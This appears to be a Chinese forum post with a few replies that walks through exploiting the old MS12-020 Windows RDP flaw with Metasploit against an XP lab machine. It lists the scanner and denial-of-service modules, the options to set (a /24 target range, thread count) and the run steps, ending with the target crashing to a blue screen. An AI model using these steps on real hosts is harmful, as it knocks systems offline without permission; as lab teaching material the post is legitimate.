【原创】ms12-020漏洞利用过程

恐怖执念

需要kali xp靶机（如果你本机安装了metasploit，直接使用就行）


首先输入msfconsole进入msf
接着search 漏洞编号 查看它的一个漏洞利用模块，这里有两个。
auxiliary/scanner/rdp/ms12_020_check  侦查
auxiliary/dos/windows/rdp/ms12_020_maxchannelids利用


那么先来用侦查模块看一下目标主机同网段的是否有主机存在漏洞
use auxiliary/scanner/rdp/ms12_020_check  进入漏洞利用模块
show options 查看需要设置的选项

这里需要设置RHOSTS（目标网段） THREADS（线程）
那么 set RHOSTS 192.168.75.0/24 扫描目标网段
set THREADS 45 线程45
run 进行扫描

接着开始扫描，可以看到这里出现了一个加号 后面跟着这一句（不懂可以百度翻译啊）
接着需要用到另一个模块来进行攻击
use auxiliary/dos/windows/rdp/ms12_020_maxchannelids 进入利用模块
接着 show options 查看需要设置什么



这里只需要给他一个地址就行 接着run 进行攻击


接着靶机就蓝屏了。。。。。。。。。。

蝶恋花

这个是命令执行还是BSOD

tx1

哥们 多少年的东西了 就别挂原创了 不过还是多谢分享

0licej

Sharpwinner
啪，蓝屏了。